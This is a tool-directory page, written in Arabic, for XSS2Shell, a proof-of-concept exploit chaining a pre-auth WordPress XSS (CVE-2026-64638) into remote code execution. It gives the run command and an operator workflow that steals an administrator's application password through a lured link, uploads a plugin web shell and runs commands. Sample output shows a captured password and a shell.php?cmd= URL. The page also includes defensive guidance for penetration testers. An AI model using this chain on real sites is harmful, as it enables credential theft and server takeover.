Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
XSS2Shell — استغلال PoC لتحويل XSS قبل المصادقة إلى RCE في Wordpress (xss2shell و CVE-2026-64638) | Kitploit
أدوات/GitHubGitHub/wordsec/xss2shell
توليد الحمولةالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالأمن الويباختبار الاختراقالتعلم والتعليم
GitHubwordsec/xss2shell

XSS2Shell

استغلال PoC لتحويل XSS قبل المصادقة إلى RCE في Wordpress (xss2shell و CVE-2026-64638)

عرض المستودع
611منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

XSS2Shell

XSS2Shell هو إثبات مفهوم تعليمي لثغرة CVE-2026-64638، يوضّح تأثير مشكلة XSS قبل المصادقة في تثبيتات WordPress القابلة للاختراق. بمشاركة صريحة من المدير (Administrator)، يلتقط الإثبات كلمة مرور تطبيق WordPress، وينشر صفحة مؤقتة، ويرفع ملحق اختبار، ويتحقق مما إذا كان بإمكان نقطة نهاية القشرة (shell endpoint) الناتجة تنفيذ أمر.

خلفية تقنية: WordPress Pre-Auth XSS to RCE: CVE-2026-64638

لأغراض التعليم والاختبار المصرّح به فقط. شغّل هذه الأداة فقط ضد مواقع WordPress التي تملكها أو لديك إذن كتابي لتقييمها. لا تستخدمها لاستهداف مدراء أطراف ثالثة أو أنظمة إنتاج.

المتطلبات

  • Python 3.7 أو أحدث
  • تثبيت WordPress تجريبي يمكن الوصول إليه
  • مدير يمكنه تسجيل الدخول إلى الهدف وفتح رابط المهاجم
  • وصول شبكي من متصفح المدير إلى عنوان المستمع
  • لا توجد حزم Python خارجية

الاستخدام

root@kitploit:~
python3 xss2shell_poc.py -t http://wordpress.research.local --lhost 192.168.1.227 --lport 8080 -c "whoami"

الخيارات

الخيارمطلوبالوصف
-t, --targetنعمعنوان WordPress الأساسي، بما في ذلك http:// أو https://
-c, --commandنعمالأمر الذي سيتم تشغيله بعد أن تصبح القشرة متاحة
--lhostلاعنوان IP للمستمع للربط والإعلان عنه؛ الافتراضي هو عنوان LAN المكتشف
--lportلامنفذ المستمع؛ 0 يختار منفذًا متاحًا عشوائيًا
--keepلاالاحتفاظ بالعناصر المنشورة بدلاً من حذف الصفحة المؤقتة

يتم تطبيع عنوان الهدف تلقائيًا، لذا فإن الشرطة المائلة الأخيرة اختيارية.

سير عمل المشغِّل

  1. تتحقق الأداة من أن /wp-login.php يمكن الوصول إليه ويبدو كصفحة تسجيل دخول WordPress.
  2. تبدأ مستمع HTTP محليًا وتطبع عنوان المستمع.
  3. يقوم المدير المصرح له بتسجيل الدخول إلى الهدف وفتح ذلك العنوان.
  4. يطلب تدفق المتصفح كلمة مرور تطبيق ويرسل النتيجة إلى المستمع.
  5. ينشر الإثبات صفحة مهاجم مؤقتة باستخدام بيانات الاعتماد الملتقطة.
  6. ترفع الصفحة ملحق الاختبار باستخدام جلسة المدير.
  7. تتحقق الأداة من shell.php وتنفذ الأمر المطلوب.

يجب أن يكون المستمع قابلاً للوصول من متصفح المدير. يمكن لقواعد NAT وجدار الحماية والوكيل وحظر النوافذ المنبثقة والمحتوى المختلط أن تمنع اكتمال تدفق المتصفح.

مثال على المخرجات

root@kitploit:~
 __          __           _  _____           
 \ \        / /          | |/ ____|          
  \ \  /\  / /__  _ __ __| | (___   ___  ___ 
   \ \/  \/ / _ \| '__/ _` |\___ \ / _ \/ __|
    \  /\  / (_) | | | (_| |____) |  __/ (__ 
     \/  \/ \___/|_|  \__,_|_____/ \___|\___|
                                              
                                              
xss2shell & CVE-2026-64638 |  https://wordsec.net/ - Education Purpose Only


============================================================
[*] XSS2Shell starting ...
[*] Checking target: http://wordpress.research.local/wp-login.php
[+] Admin panel found: http://wordpress.research.local/wp-login.php
[+] Attacker server listening: 192.168.1.227:8080
[*] On the target website, the admin must open this page and log in:
    ->  http://wordpress.research.local/wp-login.php
[*] Then the admin opens the link that was sent to them:
    ->  http://192.168.1.227:8080/
[*] Waiting for the admin to visit (Ctrl+C to stop) ...
[+] Child popup document initialized
[+] Popup window ready, XSS payload prepared
[+] Application Password saved to xss2shell_creds.json for later runs (shell: http://wordpress.research.local/wp-content/plugins/xss2shell/shell.php)
[+] XSS payload POSTed to wp-login.php
[+] Application Password stolen: user=admin pass=3SGS Loba 2Txw EzWz EbZC xZst (saved to xss2shell_creds.json)
[+] Attacker page published: http://wordpress.research.local/xss2shell-1786125273210/
[+] Plugin ZIP upload request sent with the victim's session
[+] Shell reachable: http://wordpress.research.local/wp-content/plugins/xss2shell/shell.php

============================================================
[+] Command output:
www-data
============================================================
[*] Cleanup: published page deleted (id=61)
[*] Cleanup: Application Password, plugin shell, and saved credentials preserved

[+] Shell link: http://wordpress.research.local/wp-content/plugins/xss2shell/shell.php?cmd=whoami
[+] Done.

العناصر الناتجة والتنظيف

تقوم عمليات التشغيل الناجحة بحفظ كلمة مرور التطبيق الملتقطة في xss2shell_creds.json لإعادة استخدامها في عمليات التشغيل اللاحقة. يتم حذف الصفحة المؤقتة المنشورة تلقائيًا بعد الأمر ما لم يتم استخدام --keep.

يتم الاحتفاظ بملحق الاختبار ونقطة نهاية القشرة وكلمة مرور التطبيق وبيانات الاعتماد المحفوظة عن قصد في الإثبات الحالي. قم بإزالتها يدويًا من موقع الاختبار بعد تقييم مصرح به، واحذف xss2shell_creds.json محليًا.

تعامل مع ملف بيانات الاعتماد كملف حساس ولا تدفعه أبدًا إلى نظام التحكم في الإصدارات.

إرشادات دفاعية

  • حدّث WordPress إلى إصدار غير متأثر بـ CVE-2026-64638.
  • فرض مصادقة قوية للمدير وتفعيل التحقق بخطوتين (2FA).
  • قصر تثبيت الملحقات وإنشاء كلمات مرور التطبيق على الأدوار الموثوقة.
  • راجع كلمات مرور تطبيقات المدير، والصفحات المنشورة، والملحقات المثبتة مؤخرًا بعد الاختبار.
  • راقب واحظر الطلبات غير المتوقعة إلى نقاط نهاية رفع الملحقات و REST.

الترخيص

استخدم الترخيص المرفق في هذا المستودع.

صُنع بواسطة WordSec

تنزيل الأداة